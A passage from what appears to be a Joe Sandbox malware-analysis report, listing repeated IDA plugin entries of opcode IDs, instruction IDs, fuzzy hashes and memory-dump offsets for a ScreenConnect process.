                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9711EC31E4021D9FDF18DBA8D965AEEBBB5EF89710F000469D106BB274DB781D45CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 64d1a9535a06036646420b51bce2575075cadcb7f1ad444b6640f4131408599c
                                                                                                                                                                                                                                                    • Instruction ID: c611bfe7e68b6574fa2c9c8a7eb536177c0816f8f982d31d38c5fe95bcea6441
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64d1a9535a06036646420b51bce2575075cadcb7f1ad444b6640f4131408599c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB11003590010A9FCF04DFA8D9409DEBBF5FF49354B10856AD509BB260D772AA0ACB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3288812848.0000000001B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B6D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1b6d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: dda5485b71698d8b55e150e25d98e342666992579943639445e845b0f173a2e7
                                                                                                                                                                                                                                                    • Instruction ID: 3b960c5bff54d2e52de5a1e23e3abf721edaf95b936fe6706a9cbe9979aea9ff
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dda5485b71698d8b55e150e25d98e342666992579943639445e845b0f173a2e7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5901A9721093C09FD7164A658C94752BFA8EF57220F0984CBE9888F2A3C2694804C772
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 70f15fe6bc971bf9f623fb79a218f3675ccbff389a2188ed56f5d6025bdf61f0
                                                                                                                                                                                                                                                    • Instruction ID: 8909b7715f94ec23d439d453fb595794b4d2cd565bc2b89f5d1909c733ba3b0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70f15fe6bc971bf9f623fb79a218f3675ccbff389a2188ed56f5d6025bdf61f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8801A232B002155B8B199A6DA80446BBBDDFBC862471489BEE409DB340EFB5DC068BC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3288812848.0000000001B6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B6D000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1b6d000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 05dd2498c86710b113bec647fb0517d0d2f0b20df3e50440f4482d93a2f1eac9
                                                                                                                                                                                                                                                    • Instruction ID: 9905cf1e7ba200776afd02b5730efa7d6041542d96778fabb571e82bd233d69c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05dd2498c86710b113bec647fb0517d0d2f0b20df3e50440f4482d93a2f1eac9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51012031204340DAE7244A99CD84B67BF9CEF593A0F18C565ED890B157C37D9401C6B1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 321ceca90dde9e4647f9833d607c9b43e6ba387ee4a26c396cf24a52afb36d3a
                                                                                                                                                                                                                                                    • Instruction ID: e370977729fe9ad89940c5c12440ce3d0e3387444a29a4ede9b40fef6afa0256
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 321ceca90dde9e4647f9833d607c9b43e6ba387ee4a26c396cf24a52afb36d3a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5019E336483404FC31E677478094DA3B54EED621530408FFD05A87216DFA98806CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d7e426173c1b5a9f2d7c4f6f2ba2002744046a41bed49aef743473c17c0c9198
                                                                                                                                                                                                                                                    • Instruction ID: cb048abe9905d007d134756b5b21991804229540ab432fce79f83da59496c459
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7e426173c1b5a9f2d7c4f6f2ba2002744046a41bed49aef743473c17c0c9198
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A017832D0011EDBCF09DFA9D8048CDBBB6EF89314F04806AE409B7260DB316906CBA0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9f5b7d01fd4a120caf0ef9633e7320905c25fbb54bae68518f2aa84fc640a5eb
                                                                                                                                                                                                                                                    • Instruction ID: 4ccd6357c19c268990282f3f515b2936999dc78b70fcc36ed5a98ce5da818b5f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f5b7d01fd4a120caf0ef9633e7320905c25fbb54bae68518f2aa84fc640a5eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B017CB0E402098FDB84DF68C565A6E7FF0EF04204F5081A9D40EDB361E730D945CB81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: fb03ed25310bf3b1dfc852b77a4d2a32ab1cc1c0a9244a9cf5d7132e71ba1381
                                                                                                                                                                                                                                                    • Instruction ID: a930ea2013e54799fa9b97b94a1ad2e93e620113b14b4fac19176c683fdd5a60
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb03ed25310bf3b1dfc852b77a4d2a32ab1cc1c0a9244a9cf5d7132e71ba1381
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52012C70E802098FCB88DF68D568A6E7FF5EF44304F9085A9D40EDB361EA31D945CB81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 03f1a78433b16626ad06237f194e5c8284e7de4aac6a7a21eee544723e0466c5
                                                                                                                                                                                                                                                    • Instruction ID: 0f1dc06fdfdd5cf93379c8dac460b42e62da6d732fb709b314cd4fc0eb416337
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03f1a78433b16626ad06237f194e5c8284e7de4aac6a7a21eee544723e0466c5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4FF0F9B1D401199FCB44DFACC8826DDBBF1EF48320B20806AD419EB211E7359A03CB80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c8865cd9ab34e2c906a6c3ad284813d1a2ba7498cc83d8050b09b7b5c9e2b383
                                                                                                                                                                                                                                                    • Instruction ID: 46b165b0c9d78d1d4940e44da1cf0ffdc5dd7856d96a8f5e6940cc8ba7b9635c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8865cd9ab34e2c906a6c3ad284813d1a2ba7498cc83d8050b09b7b5c9e2b383
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6F08C77B0D2185FDB28CABEA40169BBBDECBC4224B14C0BFE54DC3740E935A4018764
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d1acf7409278802705ae3707b988a1827681a6a97731e28f0939f8558c9488c1
                                                                                                                                                                                                                                                    • Instruction ID: ff1a963f47e2dbd827a32cc47535ceaec3ddcd53be4e3aa3cfaa3de2afca7473
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d1acf7409278802705ae3707b988a1827681a6a97731e28f0939f8558c9488c1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F089373002196FDF055E9898009AF3BABEBD8360B00842AF609D7251DB359C2197A5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9cd504a4dafc6678aaeffaf74c48385f5b6632e7c482d4dbb8ed7600bd4de9ab
                                                                                                                                                                                                                                                    • Instruction ID: 27eedcc6af84e505d0efdf4c05928102750a24b0b3d5a8666120717be33727cb
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9cd504a4dafc6678aaeffaf74c48385f5b6632e7c482d4dbb8ed7600bd4de9ab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDF05E317002055F9714DAADE840D5BBBEDEF886B4714863AE409CB3A4EB71EC0587A0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 500f7ce0f3d73105a2f7ca6cc6f289bcf89ef561290fa5e9b5c7355fe7912fdd
                                                                                                                                                                                                                                                    • Instruction ID: d6b6357c6252ea83f9a9edd9010b88905f673ad7aed5c5d0c60d9254822509ab
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 500f7ce0f3d73105a2f7ca6cc6f289bcf89ef561290fa5e9b5c7355fe7912fdd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86F0E231780201AB8A199B9FA89092BBBDEEFC4A1034484BFE119C7310DF74FC098794
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f1b280a6a179d4eac54418002f347a13729a5f591d35cf7240fefe708790b71f
                                                                                                                                                                                                                                                    • Instruction ID: 16ae73fbdec65bdc59c63dc3af76f3778059dc77bdc75a79e4354f7e81546407
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1b280a6a179d4eac54418002f347a13729a5f591d35cf7240fefe708790b71f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0F0242250C2D00FCB2B8778B8916993FF5EEA7200B8905DFD0818F567D758EA0AD392
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 26f93f1b280bb11cfa150d98bca759b44cec66a5b5b6ce234c4fe80cb14f335e
                                                                                                                                                                                                                                                    • Instruction ID: 69af326ce6dece164cef3dc5b0233dbb02ae995d60705c5cffd3fbccae90499a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26f93f1b280bb11cfa150d98bca759b44cec66a5b5b6ce234c4fe80cb14f335e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95F0C434900208EFDF48EFA8D545AACBBF9FB44745F5091A9C505AB264DB306A44CB45
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8a9d97c6c8f1bc27ff8bff4d67ef9498a77fc1b7049d78dcc101905a9ec95937
                                                                                                                                                                                                                                                    • Instruction ID: 8b0c14eb3c2a4df4e593cae11419df49167585953cc3ef7aa62e45f4cce1dc81
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a9d97c6c8f1bc27ff8bff4d67ef9498a77fc1b7049d78dcc101905a9ec95937
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67F0E572A0D3415FD729CB7A980558BBFDACF82228709C1FFE04CC3182E9388402C325
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d62c674ad2749a6f9700218a10c7e10362fce3d7191cd5dbb3f78339985bd265
                                                                                                                                                                                                                                                    • Instruction ID: 3edccb2b418855a0228b0e91b80e35bc8fcb3f83a03339af9f88809e948ff986
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d62c674ad2749a6f9700218a10c7e10362fce3d7191cd5dbb3f78339985bd265
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF01730B00114CFDB19DB69C664AAABBE2EF88751704806AE805CB264EB35DD11CB80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ab826cd1c99a9675e0580c3f3abcb36470dff10fb8f1cef1dd4e29017d1cb207
                                                                                                                                                                                                                                                    • Instruction ID: 8d77dc6d4e852c650f2036d805b944af86832507fa8d8634e4d5021c9c5d5e6d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab826cd1c99a9675e0580c3f3abcb36470dff10fb8f1cef1dd4e29017d1cb207
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26E06536704109AF4B08CB4ED440D6BBFAADFC9660714C06BF80DC7315DA35DD128BA4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 77400d00910e9007e487aa1187628f7613734504b1a248761a474a6d14497016
                                                                                                                                                                                                                                                    • Instruction ID: 2ab95c13f8808f9938c1d59ce016d04ef3bc756c72215027b4c30e1c518596dd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77400d00910e9007e487aa1187628f7613734504b1a248761a474a6d14497016
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF0E53A3447404FEB185EADA0D81297BD7FB8866571401BEE60EC7292CE784C068700
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1dcf1140a79c8c064e375c0dfec625111c878d62afc62deb7ef733421cbf65f7
                                                                                                                                                                                                                                                    • Instruction ID: e5e5704efca288fc1d82b18708378be96e68dc5aca5dfaa77c8ecb1d5a2385ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1dcf1140a79c8c064e375c0dfec625111c878d62afc62deb7ef733421cbf65f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F0CD30A08288DFCF4ADBA8D4805ACBFF2FF02340F9456D9C051AF1A2CB342A41CB41
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a7967ab921384fea5b22d98555b0c3bb90c4871c81c8da1a5709c970be7c2889
                                                                                                                                                                                                                                                    • Instruction ID: 757dacaadfec5150a82869a67c152686c2754b490582f9bb9853cbf591acbb3a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7967ab921384fea5b22d98555b0c3bb90c4871c81c8da1a5709c970be7c2889
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DBE0EDB58882844FEB05DF28E8894A5BB34FF0631230106CAE80483007E7355903CB62
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 981d9e32d6b58931136930f140fe55fedbee1f0d262e32e71c0735ad8d0b834b
                                                                                                                                                                                                                                                    • Instruction ID: d9638febc8b00d171d356e1848b8af8c3b9ebc69cb2c0bd7fe755f12b2db4c24
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 981d9e32d6b58931136930f140fe55fedbee1f0d262e32e71c0735ad8d0b834b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2F0D471E00219DF8B44DFADC84169EFBF5EF49200B24C16AD918EB210E331AA12CFC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f771323f6e49f006efeca97f7b2a945f0ee20ac91d26fe4a56e6a4668c8d38ae
                                                                                                                                                                                                                                                    • Instruction ID: 15b8a8f6018350513e1d881d8ec7c743e67f104ee67233d361edf2ae9eca47e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f771323f6e49f006efeca97f7b2a945f0ee20ac91d26fe4a56e6a4668c8d38ae
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 35E0DF363002105BAA282AAE648C52ABBDAFBC8A61B14007DF60AC3380CEB59C094390
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 44fee6a920b4bdd1c41d05f71960ac0327f59a8cc982c03c71294326f3aa0980
                                                                                                                                                                                                                                                    • Instruction ID: 08afc9b141ec5c21fae9ba3ba89fe4a23f65eb0143acd787f86e593388cdac06
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44fee6a920b4bdd1c41d05f71960ac0327f59a8cc982c03c71294326f3aa0980
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 04E0EDB2A082442FCB0C9BA898205ADBFE89B4B210B0854EAD08993342D93A69018384
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 53db91d589bf487baa7a80f4433888d14d8b9d9fe2bc06fbb548b270e927aa2b
                                                                                                                                                                                                                                                    • Instruction ID: bd6664c1ee3d8d5dfe63d9aa77501527da4cce9c2e4aea28cb56fdf6a0e7fdb5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53db91d589bf487baa7a80f4433888d14d8b9d9fe2bc06fbb548b270e927aa2b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3FE012332001005B861D6769B50859E769DEBD525571489FED10A8B614DF769C0A8BD0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: eb5a306c90c58b235f51723c147cd3094154ad57a1e4a3f0eb34327d19f44a8b
                                                                                                                                                                                                                                                    • Instruction ID: 60324150c7ab057f9852d5bdaca6c2dcb85f802a8b926287625bb5bf21fc56e2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb5a306c90c58b235f51723c147cd3094154ad57a1e4a3f0eb34327d19f44a8b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6DE02632B412051BC318991BEC40957F3AEEBD9664B50047CD20CC7311CE729C828290
                                                                                                                                                                                                                                                    Memory Dump Source
